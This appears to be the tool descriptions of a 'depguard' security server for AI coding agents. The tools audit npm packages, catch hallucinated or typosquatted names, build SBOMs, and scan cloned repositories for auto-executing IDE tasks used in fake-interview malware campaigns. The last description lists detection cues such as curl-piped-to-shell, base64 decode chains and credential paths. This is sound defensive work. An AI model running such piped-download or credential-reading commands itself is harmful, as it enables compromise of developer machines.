MANDATORY: call this BEFORE running npm install, yarn add, or pnpm add — whether the user asked for the package or you decided to install it yourself. Verifies the package exists (blocks hallucinated names), checks for typosquatting, runs security audit, and returns allow/warn/block. If the result is "block" or "warn", do NOT install the package without informing the user.

When you need functionality (e.g. "RTSP streaming", "date formatting"), call this BEFORE choosing a package yourself. Checks if Node.js has a native solution first, then evaluates npm candidates and recommends install, caution, or write-from-scratch. Always prefer this over picking a package from your training data — it gives you up-to-date security and quality data.

Call this AFTER making significant code changes or before the user commits. Scans source files for issues you may have introduced: console.logs left in production code, empty catch blocks, broken imports, TODOs without issue references, empty test files, orphan files. Fix the findings before reporting your work as done.

Deep security audit of a single npm package. Downloads the tarball, scans source code for malware, checks vulnerabilities (npm + GitHub Advisory), analyzes install scripts, verifies license. Use when you need full details on a specific package. Pass a version to audit a specific installed version instead of latest.

Audit ALL dependencies in a project at once. Scans direct deps (full audit), transitive deps from lock file (vulnerability check), and the packageManager field. Pass the path to package.json and get a consolidated security report. Use this when the user asks to review project security or after cloning a new repo.

Build a remediation plan for a project with known vulnerabilities. Reads package.json + lock file, runs the same audit as depguard_audit_project, then groups every vulnerable transitive under the direct dep that pulls it in. Output is sorted by severity weight so the first remediation is the highest-impact bump. Use this when the user is staring at "100 vulnerabilities found" from npm install and needs to know which 5 direct deps to upgrade. Read-only: never modifies package.json, lockfile, or runs npm.

Audit the full transitive dependency tree of a package. Crawls all nested dependencies recursively and aggregates vulnerabilities across the entire graph. Use when you need to know the total attack surface, not just direct deps.

Find unused npm packages in the project. Scans source files for imports and cross-references with package.json. Also detects phantom deps (installed but not declared). Call this after a coding session where you installed multiple packages — some may no longer be needed.

Quick 0-100 quality score for a package. Faster than depguard_audit when you only need the score. Critical vulns cap at 30, high at 50.

Quick check if a package name exists on npm + typosquatting detection. Faster than depguard_guard when you only need existence verification without a full audit.

Search npm for packages by keywords, sorted by depguard quality score. Use when you need to find packages but already know the keywords.

Audit multiple packages in one call. Accepts an array of names or a dependencies object from package.json. Use depguard_audit_project instead if you have a package.json path.

Generate a CycloneDX 1.6 Software Bill of Materials (SBOM) for an npm project. Reads package.json + lock file to enumerate direct + transitive components with PURLs and integrity hashes. Set includeVex=true to embed vulnerability data (VEX) from the audit pipeline. Use this when the user asks for an SBOM, a compliance report, or to comply with EU CRA / US EO 14028 requirements.

MANDATORY: call this AFTER cloning a repository and BEFORE opening it in any IDE (VS Code, Cursor, JetBrains, etc.) or running direnv allow. Enumerates every file in the repo that auto-executes when the workspace opens: .vscode/tasks.json runOn:folderOpen, .vscode/settings.json shell overrides, .devcontainer lifecycle commands, .envrc, JetBrains run configurations, Makefile default targets, .gitattributes custom filter drivers, and committed git hooks. Classifies each as INFO / WARN / HIGH using FP-averse heuristics (benign npm run watch stays INFO; only curl|sh, base64 decode chains, credential paths, and obfuscation escalate). This is the technical defense against fake-interview / take-home-test malware campaigns where a coding-test repo compromises the developer's session before the IDE finishes loading.